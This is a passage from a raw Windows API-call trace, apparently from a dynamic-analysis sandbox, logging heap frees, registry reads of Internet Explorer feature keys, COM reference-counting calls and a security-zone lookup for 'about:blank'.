out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | 
out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451ac0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459a70 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459bc8 | out: hHeap=0x410000) returned 1 [0077.160] GetCurrentThreadId () returned 0x90 [0077.160] GetCurrentThreadId () returned 0x90 [0077.160] GetCurrentThreadId () returned 0x90 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a08 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452930 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f4c8 | out: hHeap=0x410000) returned 1 [0077.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf994 | out: phkResult=0x2cf994*=0x248) returned 0x0 [0077.161] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf998 | out: phkResult=0x2cf998*=0x24c) returned 0x0 [0077.161] RegOpenKeyExW (in: hKey=0x24c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf954 | out: phkResult=0x2cf954*=0x0) returned 0x2 
[0077.161] RegOpenKeyExW (in: hKey=0x248, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf954 | out: phkResult=0x2cf954*=0x0) returned 0x2 [0077.161] RegCloseKey (hKey=0x0) returned 0x6 [0077.161] RegCloseKey (hKey=0x0) returned 0x6 [0077.161] RegCloseKey (hKey=0x248) returned 0x0 [0077.161] RegCloseKey (hKey=0x24c) returned 0x0 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.161] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4707c0 | out: hHeap=0x410000) returned 1 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] GetCurrentThreadId () returned 0x90 [0077.162] IUnknown:Release (This=0x45f140) returned 0x1 [0077.162] GetCurrentThreadId () returned 0x90 [0077.162] GetCurrentThreadId () returned 0x90 [0077.162] GetCurrentThreadId () returned 0x90 [0077.162] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf988 | out: ppv=0x2cf988*=0x436988) returned 0x0 [0077.162] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] free (_Block=0x2a51058) [0077.163] free (_Block=0x2a51280) [0077.163] free (_Block=0x2a510a0) [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] free (_Block=0x2a52350) [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.164] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76766460, dwCookie=0x100) returned 0x0 [0077.164] StdGlobalInterfaceTable:IUnknown:Release (This=0x58ffa0) returned 0x1 [0077.164] 
IUnknown:Release (This=0x436988) returned 0x1 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.164] IUnknown:Release (This=0x436988) returned 0x0 [0077.164] ISystemDebugEventFire:EndSession (This=0x45f140) returned 0x0 [0077.164] IUnknown:Release (This=0x45f140) returned 0x0 [0077.164] GetUserDefaultLCID () returned 0x409 [0077.164] GetACP () returned 0x4e4 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fb68 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4537c8 | out: hHeap=0x410000) returned 1 [0077.165] ??3@YAXPAX@Z () returned 0x1 [0077.165] GetCurrentThreadId () returned 0x90 [0077.165] free (_Block=0x2a52780) [0077.165] ??3@YAXPAX@Z () returned 0x1 [0077.165] ??3@YAXPAX@Z () returned 0x1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470de8 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4707d8 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f470 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d2a0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453738 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f818 | out: hHeap=0x410000) 
returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f968 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472050 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4707f0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] IUnknown:Release (This=0x444c48) returned 0x0 [0077.166] IUnknown:Release (This=0x443704) returned 0x0 [0077.166] IUnknown:Release (This=0x750296bc) returned 0x1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a798 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa10 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a428 | out: hHeap=0x410000) returned 1 [0077.166] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2cfa2c | out: ppURI=0x2cfa2c*=0x43bc54) returned 0x0 [0077.167] IUri:GetScheme (in: This=0x43bc54, pdwScheme=0x2cf9c4 | out: pdwScheme=0x2cf9c4*=0x11) returned 0x0 [0077.167] IUnknown:QueryInterface (in: This=0x43bc54, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf9cc | out: ppvObject=0x2cf9cc*=0x43bc54) returned 0x0 [0077.167] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.167] IUnknown:AddRef (This=0x43bc54) returned 0x4 [0077.167] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.167] IUri:IsEqual (in: This=0x43bfcc, pUri=0x43bc54, pfEqual=0x2cfa0c | out: pfEqual=0x2cfa0c*=0) returned 0x0 [0077.167] IUnknown:Release (This=0x43bfcc) returned 0x2 [0077.167] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.167] IUnknown:AddRef (This=0x43bc54) returned 0x4 [0077.167] IUri:GetAbsoluteUri (in: This=0x43bc54, pbstrAbsoluteUri=0x445a88 | out: pbstrAbsoluteUri=0x445a88*="about:blank") returned 0x0 [0077.167] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.167] GetCurrentProcessId () returned 0x358 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa70 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4294f0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa88 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, 
dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: 
hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43faa0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ca00 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4458f8 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43baf0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c9a8 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613b0 | out: hHeap=0x410000) returned 1 [0077.169] IUnknown:Release (This=0x43c254) returned 0x4 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d878 | out: hHeap=0x410000) returned 1 [0077.170] 
IUnknown:Release (This=0x43c254) returned 0x3 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452180 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424338 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4522b8 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4520e8 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f9e0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451fc0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451c00 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459d78 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c268 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46be68 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f3c8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a970 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x4539d8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a1e0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c2a0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faa0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c2d8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fa48 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453918 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453948 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f9f0 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4538e8 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336b8 | out: hHeap=0x410000) returned 1 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f9f0 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f9e0 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x4613b0 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fa48 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fa48 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.172] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x4436fc, dwReserved=0x0 | out: ppSM=0x4436fc*=0x461810) returned 0x0 [0077.173] IInternetSecurityManager:SetSecuritySite (This=0x461810, pSite=0x443704) returned 0x0 [0077.173] IUnknown:AddRef (This=0x443704) returned 0x31 [0077.173] IUnknown:QueryInterface (in: 
This=0x443704, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf6a4 | out: ppvObject=0x2cf6a4*=0x443708) returned 0x0 [0077.173] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x461838 | out: ppvObject=0x461838*=0x0) returned 0x80004002 [0077.173] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x461834 | out: ppvObject=0x461834*=0x0) returned 0x80004002 [0077.173] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x461830 | out: ppvObject=0x461830*=0x750296bc) returned 0x0 [0077.173] IUnknown:Release (This=0x443708) returned 0x0 [0077.173] IUnknown:AddRef (This=0x43bc54) returned 0x4 [0077.173] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="about:blank", pdwZone=0x2cf6dc, dwFlags=0x0 | out: pdwZone=0x2cf6dc*=0xffffffff) returned 0x800c0011 [0077.173] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.173] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) 
returned 0x1 [0077.173] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0077.173] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x2cf6e0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2cf6e0*=0x0) returned 0x0 [0077.173] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a588 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f520 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.174] IUnknown:Release (This=0x4206a8) returned 0x1 [0077.174] IUnknown:Release (This=0x43bc54) returned 0x2 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a88 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45db80 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a740 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453858 | out: hHeap=0x410000) returned 1 [0077.174] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x46be68 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46be68 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451c00 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336b8 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461878 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: 
hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45ef90 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4530d0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451f28 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45ef48 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453090 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43eeb0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4708c8 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444a90 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451e90 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x433558 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444be0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 
